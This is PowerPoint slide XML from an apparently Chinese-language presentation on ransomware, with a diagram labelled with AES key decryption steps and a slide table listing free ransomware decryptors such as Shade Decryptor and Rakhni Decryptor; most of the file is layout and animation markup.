            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="49" name="直接箭头连接符 48"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5374640" y="3674110"/>
            <a:ext cx="2848610" cy="791845"/>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2174240" y="5643880"/>
            <a:ext cx="193421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351405" y="5819140"/>
            <a:ext cx="1452880" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密钥解密</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="文本框 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4108450" y="5413375"/>
            <a:ext cx="1875790" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密钥</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="直接箭头连接符 52"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="26" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5125085" y="4983480"/>
            <a:ext cx="3175" cy="5194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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="80" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="90" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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additive="base">
                                        <p:cTn id="93" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="94" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>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additive="base">
                                        <p:cTn id="97" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="98" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="39"/>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additive="base">
                                        <p:cTn id="101" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="102" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40"/>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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="105" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="10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49"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="111" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="49"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="112" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="115" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="116" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>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additive="base">
                                        <p:cTn id="119" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="120" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>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24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="123" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="124" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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additive="base">
                                        <p:cTn id="127" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="128" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>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26"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="131" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="1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additive="base">
                                        <p:cTn id="137" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="138" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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37"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="141" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="142" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="145" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="14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4" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="150" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="151" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="152" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>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48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="155" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="156" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>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52"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="159" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="160" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52"/>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53"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="163" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="168" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="169" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="170" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>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51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="173" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17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 grpId="0" animBg="1"/>
      <p:bldP spid="4" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="0" animBg="1"/>
      <p:bldP spid="10" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="31" grpId="0"/>
      <p:bldP spid="34" grpId="0"/>
      <p:bldP spid="35" grpId="0" animBg="1"/>
      <p:bldP spid="37" grpId="0"/>
      <p:bldP spid="40" grpId="0"/>
      <p:bldP spid="48" grpId="0"/>
      <p:bldP spid="51" grpId="0"/>
      <p:bldP spid="52"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免费勒索软件解密</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="714375" y="781685"/>
          <a:ext cx="11007725" cy="5120640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2352040">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="8655685">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>工具</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>功能</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="379730">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Shade Decryptor</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>解密受所有Shade版本影响的文件</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="914400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Rakhni Decryptor</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>解密被Rakhni、Agent.iih、Aura、Autoit、Pletor、Rotor、Lamer、Cryptokluchen、Lortok、Democry、Bitman、TeslaCrypt（V3和V4）、Chimera、Crysis（V2和V3）锁定的文件。最新更新：解密Cryakl勒索软件</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
